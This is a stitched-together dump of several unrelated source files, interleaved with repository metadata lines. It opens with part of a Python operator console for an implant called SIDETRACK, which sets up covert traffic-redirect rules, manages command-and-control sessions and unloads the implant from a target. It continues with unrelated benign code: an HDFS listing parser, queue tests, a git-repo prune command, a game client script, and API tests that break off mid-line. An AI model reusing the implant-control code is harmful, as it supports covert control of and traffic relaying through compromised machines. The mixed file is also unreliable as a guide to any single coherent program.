== 6 and localredir == 0 and encrypt: seq = struct.unpack("!L", rd[22:26])[0] if encrypt: encrypt = struct.unpack("!LLLL",rd[6:22]) else: encrypt = (0,0,0,0) base.db(2, seq) base.db(2, ident) self.redir =REDIRECT(self,insert,longevity,conn_to,protocol,A_ip,T_ip,\ ident,seq,munge,encrypt,ttl_mod,flags,\ A_port,SA_port,T_port,ST_port) ruleRes = self.redir.add() if ruleRes[0] and cmd != None: if cmd.redir != None: cmd.redir.next = self.redir self.redir.prev = cmd.redir return ruleRes ############################################################################# # REDIRLIST class # opcode 0x24 ############################################################################# class SIDECMD_REDIRLIST(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "redirlist" self.usage = "redirlist [rule]" self.info = "List redirect entries." self.op = 0x24L def parseReturn(self): self.ret, self.rule, self.longevity, self.conn_to, \ self.A_ip, self.T_ip, self.flags = \ struct.unpack("!LLLLLLH",self.data[:26]) self.ttl_mod = struct.unpack("!H",'\000'+self.data[26:27])[0] self.protocol = struct.unpack("!H", '\000'+self.data[27:28])[0] self.conns, self.ATcount, self.TAcount, self.seen, self.munge, \ self.A_port, self.SA_port, self.T_port, self.ST_port, \ self.seq = struct.unpack("!LLLLLHHHHL",self.data[28:60]) self.A_ip = self.ConvertToDot(self.A_ip) self.T_ip = self.ConvertToDot(self.T_ip) self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:] if self.protocol == 1: self.protocol = "ICMP" elif self.protocol == 6: self.protocol = "TCP" elif self.protocol == 17: self.protocol = "UDP" elif self.protocol == 0: self.protocol = "ALL" else: self.protocol = eval("'%d'" % (self.protocol)) if (self.flags & 0x1L): self.active = "ACTIVE" else: self.active = "INACTIVE" self.opts = '' if not (self.flags & 0x2L): self.opts = self.opts + '-afix ' if not (self.flags & 0x4L): self.opts = self.opts + '-tfix ' if (self.flags & 0x400L): self.opts = self.opts + '-samesum ' if self.flags & 0x8L: if self.ttl_mod == 0: self.opts = self.opts + '-ttl reset ' else: self.opts = self.opts + '-ttl %d ' % (self.ttl_mod) else: if self.ttl_mod > 127: self.opts = self.opts + '-ttl %d' % (self.ttl_mod-256) else: self.opts = self.opts + '-ttl +%d ' % (self.ttl_mod) if not (self.flags & 0x30L): self.opts = self.opts + '-nocrypto ' def outputPorts(self,attacker,flags,ip,lport,rport): if flags & 0x40 or flags & 0x180 == 0x180: return ip if attacker and flags & 0x80: rport = '*' if attacker and flags & 0x100: lport = '*' if not attacker and flags & 0x80: lport = '*' if not attacker and flags & 0x100: rport = '*' if type(lport) != type('*'): lport = '%d' %(lport) if type(rport) != type('*'): rport = '%d' %(rport) return '%s:%s/%s' % (ip,lport,rport) def outputCurrent(self): res = '%-5d %s Connection timeout: %s Expires: %s\n' % \ (self.rule,self.active,\ self.TimeConvert(self.conn_to),self.longevity) res = res + ' %s %s %s %s\n' % \ (self.protocol, self.outputPorts(1,self.flags,self.A_ip,self.A_port,self.SA_port), self.outputPorts(0,self.flags,self.T_ip,self.T_port,self.ST_port), self.opts) res = res + ' Connections: %-4d Last seen %s\n A->T count: %-6d T->A count: %-6d\n' % (self.conns, time.ctime(self.seen-self.implant.timediff)[4:], self.ATcount, self.TAcount) return (1, res) def listOne(self,rule): self.data = struct.pack("!LL",rule,0) self.Query() if self.op == 0x24L and self.res == 0x01L: self.parseReturn() return self.outputCurrent() else: return (0, "Implant did not return a valid response") def listAll(self): out = '' self.ret = 1 self.rule = 0 while self.ret == 1: self.data = struct.pack("!LL",0,self.rule) self.Query() if self.op == 0x24L and self.res == 0x01L: self.parseReturn() res = self.outputCurrent() if res[0] == 0: return res else: out = out + res[1] else: return (0, "Error receiving result") if self.ret == 2: return (1, "No rules to list") else: return (1, out) def run(self,rule=None): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) if self.implant.version < 2.0: return (0, "This feature is only available in versions >= 2.0") if rule == None: res = self.listAll() else: res = self.listOne(rule) return res ############################################################################# # REDIRSET class # opcode 0x25 ############################################################################# class SIDECMD_REDIRSET(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "redirset" self.usage = "redirset <rule|all> <active|inactive>" self.info = "Set a redirect rule as being active or inactive." self.op = 0x25L def run(self, rule, status): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) if type(rule) == type("a") and string.upper(rule)[:1] == 'A': rule = 0 if string.upper(status[:1]) == 'A': status = 1 elif string.upper(status[:1]) == 'I': status = 0 i=0 while i < len(self.implant.rules): if self.implant.rules[i].remoteRuleNum == rule or rule == 0: res = self.implant.rules[i].set(status) if res[0] == 0: return res elif rule != 0: break i = i + 1 base.db(3,res[1]) if i == len(self.implant.rules) and rule != 0: return (0, "Rule does not exist") else: return (1, "Rule(s) set successfully") ############################################################################# # CONNREMOVE class # opcode 0x28 ############################################################################# class SIDECMD_CONNREMOVE(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "connrm" self.usage = "connrm <rule|all>" self.info = "Remove a connection entry (or all connection entries)" self.op = 0x28L def run(self, rule): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) if self.implant.version < 2.0: return (0, "This feature is only available in versions >= 2.0") if type(rule) == type("a") and string.upper(rule)[:1] == 'A': rule = 0 self.data = struct.pack("!L",rule) self.Query() if self.op == 0x28L and self.res == 0x1L: return (1, "Connection(s) removed successfully") else: return (0, "Error removing connection(s)") ############################################################################# # CONNLIST class # opcode 0x27 ############################################################################# class SIDECMD_CONNLIST(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "connlist" self.usage = "connlist [-c <rule> | -r <redir>]" self.info = "Lists a (or all) connection rules" self.op = 0x27L def convertState(self,state): if state == 0: return "INIT" elif state == 1: return "SYN_SENT" elif state == 2: return "SYN_RCVD" elif state == 3: return "SYN_ACK_RCVD" elif state == 4: return "SYN_ACK_SENT" elif state == 5: return "ESTABLISHED" elif state == 6: return "FIN_SENT" def parseReturn(self): self.ret,self.rule,self.redir,self.longevity = struct.unpack("!LLLL",self.data[0:16]) self.protocol = struct.unpack("!H", '\000'+self.data[16:17])[0] sendstate = struct.unpack("!H",'\000'+self.data[17:18])[0] recvstate = struct.unpack("!H",'\000'+self.data[18:19])[0] sender = struct.unpack("!H",'\000'+self.data[19:20])[0] self.at_cnt, self.ta_cnt, self.last, self.Aip, self.SAip, self.Tip,\ self.STip, self.Aport, self.SAport, self.Tport, self.STport \ = struct.unpack("!LLLLLLLHHHH",self.data[20:56]) self.leftState = '' self.rightState = '' if self.protocol == 6: self.protocol = "TCP" if sender == 1: self.leftState = self.convertState(sendstate) self.rightState = self.convertState(recvstate) else: self.leftState = self.convertState(recvstate) self.rightState = self.convertState(sendstate) elif self.protocol == 17: self.protocol = "UDP" else: self.protocol = '%d' %(self.protocol) def outputCurrent(self): res = '%d %s Redir rule: %d Last seen: %s\n %s:%d <-%s(%d)-> %s:%d\n %s:%d <-%s(%d)-> %s:%d\n' % \ (self.rule,self.protocol,self.redir, time.ctime(self.last+self.implant.timediff)[4:], self.ConvertToDot(self.Aip),self.Aport, self.leftState,self.at_cnt, self.ConvertToDot(self.SAip),self.SAport, self.ConvertToDot(self.STip),self.STport, self.rightState,self.ta_cnt, self.ConvertToDot(self.Tip),self.Tport) return (1,res) def listAll(self,redir): out = '' self.ret = 1 self.rule = 0 while self.ret == 1: self.data = struct.pack("!LLL",0,self.rule,redir) self.Query() if self.op == 0x27L and self.res == 0x01L: self.parseReturn() res = self.outputCurrent() if res[0] == 0: return res else: out = out + res[1] else: return (0, "Error receiving result") if self.ret == 2: return (1,"No connections to list") else: return (1,out) def listOne(self,rule): self.data = struct.pack("!LLL",rule,0,0) self.Query() if self.op == 0x27L and self.res == 0x01L: self.parseReturn() return self.outputCurrent() else: return (0, "Implant did not return a valid response") def run(self, option=None, value=None): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) if self.implant.version < 2.0: return (0, "This feature is only available in versions >= 2.0") rule = 0 redir = 0 if option != None: if option == '-c': rule = value elif option == '-r': redir = value else: raise TypeError, option if rule == 0: res = self.listAll(redir) else: res = self.listOne(rule) return res ############################################################################# # REDIRREMOVE class # opcode 0x26 ############################################################################# class SIDECMD_REDIRREMOVE(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "redirrm" self.usage = "redirrm <rule|all>" self.info = "Remove a redirect rule (or all redirect rules)" self.op = 0x26L def run(self, rule): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) if self.implant.version < 2.0: return (0, "This feature is only available in versions >= 2.0") removed = 0 if type(rule) == type("a") and string.upper(rule)[:1] == 'A': rule = 0 i = 0 while i < len(self.implant.rules): if self.implant.rules[i].remoteRuleNum == rule or rule == 0: res = self.implant.rules[i].remove() if res[0] == 0: return res removed = 1 i = i - 1 i = i + 1 if removed == 0 or rule == 0: self.data = struct.pack("!L",rule) self.Query() if self.op == 0x26L and self.res == 0x1L: return (1, "Rule(s) removed successfully") else: return (0, "Error removing rule(s)") else: return res ############################################################################# # CCLIST class # opcode 0x29 ############################################################################# class SIDECMD_CCLIST(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "cclist" self.usage = "cclist" self.info = "List all of the command and control sessions" self.op = 0x29L def parseReturn(self): self.more,self.rule,self.longevity,self.srcip,self.dstip,\ self.srcport,self.dstport = struct.unpack("!LLLLLHH",self.data[0:24]) if self.more & 2L: self.current = "(CURRENT) " else: self.current = "" self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:] self.srcip = self.ConvertToDot(self.srcip) self.dstip = self.ConvertToDot(self.dstip) def displayCurrent(self): # STUB: Make this better! if self.rule == 0xffffffffL: return "" res = "%d %s%s:%d<->%s:%d Expires: %s\n" % \ (self.rule,self.current,self.srcip,self.srcport,\ self.dstip,self.dstport,self.longevity) return res def run(self): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) if self.implant.version < 2.0: return (0, "This feature is only available in versions >= 2.0") res = "" last = 0L self.more = 1 while self.more & 1L: self.data = struct.pack("!L",last) self.Query() if self.op == 0x29L and self.res == 0x1L: self.parseReturn() res = self.displayCurrent() + res last = self.rule else: return (0, "Error getting CC rules") return (1,res) ############################################################################# # CCREMOVE class # opcode 0x2a ############################################################################# class SIDECMD_CCREMOVE(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "ccremove" self.usage = "ccremove <rule>" self.info = "Remove a command and control session (see also: done)" self.op = 0x2aL def run(self,rule): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) if self.implant.version < 2.0: return (0, "This feature is only available in versions >= 2.0") self.data = struct.pack("!L",rule) self.Query() if self.op == 0x2aL and self.res == 0x1L: return (1, "Session removed successfully") else: return (0, "Unable to remove CC session (note: you cannot remove yourself, see: done)") ############################################################################# # UNLOAD class # opcode 0x30 ############################################################################# class SIDECMD_UNLOAD(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "stunload" self.usage = "stunload <magic>" self.info = "Remove SIDETRACK from the target" self.op = 0x30L def run(self, magic): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) if self.implant.version < 2.0: return (0, "This feature is only available in versions >= 2.0") self.data = struct.pack("!L",magic); self.Query() if self.op == 0x30L and self.res == 0x1L: return (1, "SIDETRACK successfully removed from target") else: return (0, "Cannot remove SIDETRACK"); base.RegisterImplant('SIDETRACK', SIDETRACK) class REDIRECT(SIDECMD): def __init__(self, cmd, next, longevity, connection_timeout, protocol,\ A_ip, T_ip, ident, seq, munge, crypto_key, ttl_mod, flags, \ A_port, SA_port, T_port, ST_port): SIDECMD.__init__(self) self.protocol = cmd.protocol self.implant = cmd.implant self.session = cmd.implant.session self.target = cmd.implant.session.target self.longevity = longevity self.nextRule = next self.connection_timeout = connection_timeout self.proto = protocol self.A_ip = A_ip self.T_ip = T_ip self.ident = ident self.seq = seq self.munge = munge self.crypto_key = crypto_key self.ttl_mod = ttl_mod self.flags = flags self.A_port = A_port self.SA_port = SA_port self.T_port = T_port self.ST_port = ST_port self.added = 0 self.localRuleNum = None self.remoteRuleNum = None self.prev = None self.next = None self.ccPassthru = None def remove(self,direction=0): if self.added == 0: return (0, "Rule does not exist") if self.ccPassthru != None: cmd = self.ccPassthru.GetCommand('done') cmd.run() if direction != 1 and self.next != None: res = self.next.remove(2) if res[0] == 0: return (res[0], "Rule could not be removed: " + res[1]) self.next = None if self.remoteRuleNum != None: self.op = 0x26L self.data = struct.pack("!L",self.remoteRuleNum) self.Query() if self.op == 0x26L and self.res == 0x1L: base.redir.delete(self.localRuleNum) self.added = 0 self.localRuleNum = None self.implant.rules.remove(self) if direction != 2 and self.prev != None: res = self.prev.remove(1) if res[0] == 0: return (0,"Rule %d removed: %s"%(self.remoteRuleNum,res[1])) return (1, "Rule %d removed"%(self.remoteRuleNum)) else: return (0, "Rule could not be removed") else: base.redir.delete(self.localRuleNum) return (1, "Local rule removed") def set(self,value,direction=0): if self.added == 0: return (0, "Rule does not exist") if direction != 1 and self.next != None: res = self.next.set(value,2) if res[0] == 0: return(res[0], "Rule could not be set: " + res[1]) if self.remoteRuleNum: self.op = 0x25L self.data = struct.pack("!LH",self.remoteRuleNum, value) self.Query() if self.op == 0x25L and self.res == 0x1L: base.redir.set(self.localRuleNum, value) if direction != 2 and self.prev != None: res = self.prev.set(value,1) if res[0] == 0: return (0,"Rule %d set: %s"%(self.remoteRuleNum,res[1])) return (1, "Rule %d set"%(self.remoteRuleNum)) else: return (0, "Rule could not be set") else: base.redir.set(self.localRuleNum, value) return (1, "Local rule set") def add(self, addremote=1): if self.added == 1: return (0, "Rule already exists", 0) AT_ip = 0 if addremote: self.op = 0x23L self.data = struct.pack("!LLL",self.nextRule, self.longevity,\ self.connection_timeout) self.data = self.data + self.A_ip + self.T_ip self.data = self.data + struct.pack("!HHLLLLLHHHHHHL",self.flags,\ (self.ttl_mod << 8 | self.proto), self.munge,\ self.crypto_key[0],self.crypto_key[1],self.crypto_key[2],\ self.crypto_key[3], self.ident, 0, self.A_port, \ self.SA_port, self.T_port, self.ST_port, self.seq) self.Query() if self.op == 0x23L and self.res == 0x01L: self.remoteRuleNum = struct.unpack("!L", self.data[0:4])[0] AT_ip = struct.unpack("!L", self.data[4:8])[0] self.ST_ip = self.data[4:8] res = base.redir.redir(self.longevity,self.connection_timeout,\ self.ConvertIP(self.target.ip), \ self.T_ip,\ self.seq, self.munge, self.crypto_key, \ self.flags, self.A_port, self.SA_port,\ self.ident, self.proto) if res < 1: self.op = 0x26L self.data = struct.pack("!L",self.remoteRuleNum) self.Query() if self.op == 0x26L and self.res == 0x1L: self.remoteRuleNum = None return (0, "Local rule could not be added", AT_ip) else: return (0, "Local rule could not be added, remote rule may still exist", AT_ip) self.localRuleNum = res self.added = 1 self.implant.rules.append(self) return (self.remoteRuleNum, "Rule %d added" %(self.remoteRuleNum), AT_ip) else: return (0, "Remote rule could not be added", AT_ip) else: self.remoteRuleNum = None res = base.redir.redir(self.longevity,self.connection_timeout,\ self.ConvertIP(self.target.ip), \ self.T_ip,\ self.seq, self.munge, self.crypto_key, \ self.flags, self.A_port, self.SA_port,\ self.ident, self.proto) if res < 1: return (0, "Local rule could not be added", 0) self.added = 1 self.localRuleNum = res return (1, "Local rule added", 0)
unlicense
5,147,977,936,728,221,000
35.501265
289
0.462023
false
simondolle/hls-autocomplete
hls_autocomplete/parse.py
1
5470
#!/usr/bin/env python # -*- coding: UTF-8 -*- import datetime from time import strptime import re import os import json class FileStatus(object): def __init__(self, path, rights, nbFiles, owner, group, size, date, relpath = None): self.path = path self.rights = rights self.nbFiles = nbFiles self.owner = owner self.group = group self.size = size self.date = date self.relpath = relpath def __eq__(self, other): return (self.path == other.path and self.rights == other.rights and self.nbFiles == other.nbFiles and self.owner == other.owner and self.group == other.group and self.size == other.size and self.date == other.date) def is_dir(self): return self.rights.startswith("d") def __str__(self): return self.to_str(0, 0, 0, 0, 0, 0, 0) def to_str(self, rights_width, nbFiles_width, owner_width, group_width, size_width, date_width, path_with): if self.is_dir: nb_files = "-" else: nb_files = str(self.nbFiles) result = "%s %s %s %s %s %s %s" % (self.rights.ljust(rights_width), nb_files.ljust(nbFiles_width), self.owner.ljust(owner_width), self.group.ljust(group_width), str(self.size).ljust(size_width), self.date.strftime("%Y-%M-%d %H:%M").ljust(date_width), self.path.ljust(path_with)) return result.encode("utf-8") def get_file_statuses_pretty_print(file_statuses): rights_width = 0 nb_files_width = 0 owner_width = 0 group_width = 0 size_width = 0 date_width = 0 path_width = 0 if len(file_statuses) != 0: rights_width = max([len(fs.rights) for fs in file_statuses]) nb_files_width = max([len(str(fs.nbFiles)) for fs in file_statuses]) owner_width = max([len(fs.owner) for fs in file_statuses]) group_width = max([len(fs.group) for fs in file_statuses]) size_width = max([len(str(fs.size)) for fs in file_statuses]) date_width = max([len(fs.date.strftime("%Y-%M-%d %H:%M")) for fs in file_statuses]) path_width = max([len(fs.path) for fs in file_statuses]) result = [] for file_status in file_statuses: result.append(file_status.to_str(rights_width, nb_files_width, owner_width, group_width, size_width, date_width, path_width)) return "\n".join(result) class LsParser(object): def __init__(self): pass def parse_line(self, line): regex = "^([rwxd@+-]+)\s+(\d+)\s+(\w+)\s+(\w+)\s+(\d+)\s+(\d+)\s+(\w+)\s+([:\d]+)\s+(/.+)$" m = re.match(regex, line, re.UNICODE) if m is None: return None rights = m.group(1) nbFiles = int(m.group(2)) owner = m.group(3) group = m.group(4) size = int(m.group(5)) day = int(m.group(6)) month = m.group(7) try: month = strptime(month, '%b').tm_mon except: month = [u"jan", u"fév", u"mar", u"avr", u"mai", u"jui", u"juil", u"aoû", u"sep", u"oct", u"nov", u"déc"].index(month) + 1 try: year = int(m.group(8)) except: year = datetime.datetime.now().year filename = m.group(9) date = datetime.date(year, month, day) return FileStatus(filename, rights, nbFiles, owner, group, size, date) def parse(self, output): result = [self.parse_line(line) for line in output.split("\n")] return [p for p in result if p is not None] class WebHdfsParser(object): def __init__(self, path): self.path = path def permissions_to_unix_name(self, is_dir, rights): is_dir_prefix = 'd' if is_dir else '-' sticky = False if len(rights) == 4 and rights[0] == '1': sticky = True rights = rights[1:] dic = {'7': 'rwx', '6': 'rw-', '5': 'r-x', '4': 'r--', '3': '-wx', '2': '-w-', '1': '--x', '0': '---'} result = is_dir_prefix + ''.join(dic[x] for x in rights) if sticky: result = result[:-1] + "t" return result def parse_status(self, status): relpath = status["pathSuffix"] path = os.path.join(self.path, relpath) nbFiles = 0 size = status["length"] owner = status["owner"] group = status["group"] is_dir = status["type"] == "DIRECTORY" right_digits = status["permission"] rights = self.permissions_to_unix_name(is_dir, right_digits) parsed_date = datetime.datetime.utcfromtimestamp(int(status["modificationTime"])/1000) date = datetime.datetime(parsed_date.year, parsed_date.month, parsed_date.day, parsed_date.hour, parsed_date.minute) return FileStatus(path, rights, nbFiles, owner, group, size, date, relpath) def parse(self, output): try: j = json.loads(output) except: print output return [] if "FileStatuses" not in j or "FileStatus" not in j["FileStatuses"]: print j return [] statuses = j["FileStatuses"]["FileStatus"] result = [] for status in statuses: result.append(self.parse_status(status)) return result
mit
8,956,800,245,281,798,000
33.821656
134
0.539601
false
shendo/taskq
tests/test_queue.py
1
6485
# TaskQ - Priority queue with task categorisation support # Copyright (C) 2014 Steve Henderson # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from __future__ import unicode_literals import time from taskq import Queue from taskq import policy def test_fifo(): q = Queue() q.push('test1') q.push('test2') assert q.pop() == 'test1' assert q.pop() == 'test2' def test_duplicate(): q = Queue() q.push('test') try: q.push('test') assert False except ValueError: pass q.discard('test') q.push('test') assert len(q) == 1 def test_operators(): q = Queue() assert not q assert not len(q) q.push('test1') assert q assert len(q) q.push('test2') assert len(q) == 2 def test_priorities(): q = Queue() q.push('test1', 1) q.push('test2', 2) q.push('test3', 3) assert q.pop() == 'test1' assert q.pop() == 'test2' assert q.pop() == 'test3' q.push('test3', 3) q.push('test2', 2) q.push('test1', 1) assert q.pop() == 'test1' assert q.pop() == 'test2' assert q.pop() == 'test3' # insert order maintained at same priority q.push('test1', 1) q.push('test2', 1) q.push('test3', 1) assert q.pop() == 'test1' assert q.pop() == 'test2' assert q.pop() == 'test3' # complex types supported q.push('test1', (1, time.time())) q.push('test2', (1, time.time())) q.push('test3', (1, time.time())) assert q.pop() == 'test1' assert q.pop() == 'test2' assert q.pop() == 'test3' q.push('test1', (1, time.time())) q.push('test3', (2, time.time())) q.push('test2', (1, time.time())) assert q.pop() == 'test1' assert q.pop() == 'test2' assert q.pop() == 'test3' def test_categories(): q = Queue() q.push('test', category='foo') assert q.pop() == 'test' q.push('test', category='foo') assert not q.pop(categories=['bar']) assert q.pop(categories=['foo']) == 'test' q.push('test', category='foo') assert q.pop(categories=['bar', 'foo', 'cat']) == 'test' def test_multipop(): q = Queue() q.push('test1') assert q.pop(1) == ['test1'] q = Queue() q.push('test1') q.push('test2') assert q.pop(2) == ['test1', 'test2'] q = Queue() q.push('test1') assert q.pop(2) == ['test1'] q = Queue() q.push('test3', 3) q.push('test1', 1) q.push('test2', 1) assert q.pop(2) == ['test1', 'test2'] q = Queue() q.push('test1', category='foo') q.push('test2', category='bar') q.push('test3', category='foo') assert q.pop(2, categories=['fish', 'foo']) == ['test1', 'test3'] q = Queue() for x in range(1000): q.push(x) for i, x in enumerate(q.pop(1000)): assert i == x def test_ratios(): q = Queue() q.push('test1', 1, 'cat') q.push('test2', 2, 'cat') q.push('test3', 2, 'cat') q.push('test4', 3, 'cat') assert len(q.pop(2, categories=['cat'], ratios=[0.5])) == 4 q = Queue() q.push('test1', 2, 'foo') assert len(q.pop(1, categories=['foo'], ratios=[20000])) == 1 q = Queue() assert q.pop(10, categories=['foo'], ratios=[20000]) == [] q = Queue() q.push('test1', 1, 'foo') q.push('test2', 2, 'bar') q.push('test3', 2, 'cat') q.push('test4', 3, 'cat') assert len(q.pop(3, categories=['cat', 'foo', 'bar'], ratios=[0.5, 1, 1])) == 4 def test_discard(): q = Queue() q.push('test1', 1, 'foo') q.discard('test1') assert not q assert not q.pop() q = Queue() q.push('test1', 1, 'foo') q.push('test2', 1, 'bar') q.push('test3', 1, 'foo') q.discard('test2') assert len(q) == 2 assert q.pop(2) == ['test1', 'test3'] q = Queue() q.push('test1', 1, 'foo') q.push('test2', 1, 'bar') q.push('test3', 1, 'foo') q.discard('test2') q.discard('test1') q.compact() assert len(q) == 1 assert q.pop() == 'test3' def test_policies(): q = Queue(maxsize=1, full_policy=policy.discard) q.push('test1') q.push('test2') assert len(q) == 1 assert q.pop() == 'test1' q = Queue(maxsize=1, full_policy=policy.discard_random) q.push('test1') q.push('test2') assert len(q) == 1 assert q.pop() == 'test2' q = Queue(maxsize=3, full_policy=policy.discard_random) q.push('test1', 1, 'foo') q.push('test2', 2, 'bar') q.push('test3', 1, 'foo') q.push('test4', 3, 'bar') assert len(q) == 3 assert 'test4' in [ q.pop() for _ in range(3) ] q = Queue(maxsize=1, full_policy=policy.exception) q.push('test1') try: q.push('test2') assert False # should have raised except policy.QueueFullException: pass def test_full(): # default no limit q = Queue() assert not q.full() q.push('test1') q.push('test2') assert not q.full() # 0 = no limit q = Queue(maxsize=0) assert not q.full() q.push('test1') q.push('test2') assert not q.full() # -ve = no limit q = Queue(maxsize=-1) assert not q.full() q.push('test1') q.push('test2') assert not q.full() # check with pop q = Queue(maxsize=2) assert not q.full() q.push('test1') q.push('test2') assert q.full() q.pop() assert not q.full() q.push('test3') assert q.full() # check with discard q = Queue(maxsize=1) assert not q.full() q.push('test1') assert q.full() q.discard('test1') assert not q.full() q.push('test2') assert q.full() # check when discarded by policy q = Queue(maxsize=1, full_policy=policy.discard) assert not q.full() q.push('test1') assert q.full() q.push('test2') assert q.full() q.pop() assert not q.full()
gpl-3.0
-1,092,346,553,628,017,700
23.657795
83
0.551735
false
lipro-yocto/git-repo
subcmds/prune.py
1
1907
# Copyright (C) 2008 The Android Open Source Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from color import Coloring from command import PagedCommand class Prune(PagedCommand): common = True helpSummary = "Prune (delete) already merged topics" helpUsage = """ %prog [<project>...] """ def Execute(self, opt, args): all_branches = [] for project in self.GetProjects(args): all_branches.extend(project.PruneHeads()) if not all_branches: return class Report(Coloring): def __init__(self, config): Coloring.__init__(self, config, 'status') self.project = self.printer('header', attr='bold') out = Report(all_branches[0].project.config) out.project('Pending Branches') out.nl() project = None for branch in all_branches: if project != branch.project: project = branch.project out.nl() out.project('project %s/' % project.relpath) out.nl() print('%s %-33s ' % ( branch.name == project.CurrentBranch and '*' or ' ', branch.name), end='') if not branch.base_exists: print('(ignoring: tracking branch is gone: %s)' % (branch.base,)) else: commits = branch.commits date = branch.date print('(%2d commit%s, %s)' % ( len(commits), len(commits) != 1 and 's' or ' ', date))
apache-2.0
-1,370,391,103,459,699,500
28.796875
74
0.633456
false
longde123/MultiversePlatform
server/src/multiverse/simpleclient/testclientgroups/group12.py
1
1820
# # The Multiverse Platform is made available under the MIT License. # # Copyright (c) 2012 The Multiverse Foundation # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation # files (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, # merge, publish, distribute, sublicense, and/or sell copies # of the Software, and to permit persons to whom the Software # is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES # OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. # # from multiverse.mars import * from multiverse.mars.objects import * from multiverse.mars.util import * from multiverse.server.math import * from multiverse.server.events import * from multiverse.server.objects import * from multiverse.server.engine import * from multiverse.server.util import * from multiverse.msgsys import * from multiverse.simpleclient import * from java.lang import * # PlayerClient instance Log.debug("playerclient.py starting PlayerThread"); playerClient = PlayerClient("--zero_y --position (1800505,79698,73582) --square_side 100000") Log.debug("completed playerclient.py")
mit
2,642,791,384,150,277,000
38.565217
93
0.767033
false
escattone/kuma
kuma/api/v1/tests/test_plus.py
1
4264
import json import pytest from kuma.core.urlresolvers import reverse from kuma.plus.models import LandingPageSurvey @pytest.mark.django_db def test_ping_landing_page_survey_happy_path(client, settings): # This sets the needed session cookie variant_url = reverse("api.v1.plus.landing_page_variant") response = client.get(variant_url) assert response.status_code == 200 variant = response.json()["variant"] url = reverse("api.v1.plus.landing_page_survey") response = client.get(url, HTTP_CLOUDFRONT_VIEWER_COUNTRY_NAME="Antartica") assert response.status_code == 200 (result,) = LandingPageSurvey.objects.all() assert result.variant == variant assert not result.email assert not result.response assert result.geo_information == "Antartica" # Now fill it with an email response = client.post( url, {"uuid": str(result.uuid), "email": " [email protected] "}, ) assert response.status_code == 200 (result,) = LandingPageSurvey.objects.all() assert result.variant == variant assert result.email == "[email protected]" assert not result.response # Now fill it with a response response = client.post( url, { "uuid": str(result.uuid), "response": json.dumps({"price": "perfect"}), }, ) assert response.status_code == 200 (result,) = LandingPageSurvey.objects.all() assert result.variant == variant assert result.email == "[email protected]" assert result.response == json.dumps({"price": "perfect"}) @pytest.mark.django_db def test_ping_landing_page_survey_bad_request(client): url = reverse("api.v1.plus.landing_page_survey") # No ?variant=... response = client.get(url) assert response.status_code == 400 # This sets the needed session cookie variant_url = reverse("api.v1.plus.landing_page_variant") response = client.get(variant_url) assert response.status_code == 200 # Not a valid UUID response = client.get(url, {"uuid": "xxx"}) assert response.status_code == 400 # Not a recognized UUID response = client.get(url, {"uuid": "88f7a689-454a-4647-99bf-d62fa66da24a"}) assert response.status_code == 404 @pytest.mark.django_db def test_ping_landing_page_survey_reuse_uuid(client): # This sets the needed session cookie variant_url = reverse("api.v1.plus.landing_page_variant") response = client.get(variant_url) assert response.status_code == 200 url = reverse("api.v1.plus.landing_page_survey") response1 = client.get(url, HTTP_CLOUDFRONT_VIEWER_COUNTRY_NAME="Sweden") assert response1.status_code == 200 assert LandingPageSurvey.objects.all().count() == 1 response2 = client.get( url, {"uuid": response1.json()["uuid"]}, HTTP_CLOUDFRONT_VIEWER_COUNTRY_NAME="USA", ) assert response2.json()["uuid"] == response1.json()["uuid"] assert LandingPageSurvey.objects.all().count() == 1 @pytest.mark.django_db def test_ping_landing_page_survey_authenticated(user_client, wiki_user): # This sets the needed session cookie variant_url = reverse("api.v1.plus.landing_page_variant") response = user_client.get(variant_url) assert response.status_code == 200 url = reverse("api.v1.plus.landing_page_survey") response = user_client.get(url) assert response.status_code == 200 (result,) = LandingPageSurvey.objects.all() assert result.user == wiki_user @pytest.mark.django_db def test_landing_page_variant_happy_path(client, settings): # Note `settings.PLUS_VARIANTS` is 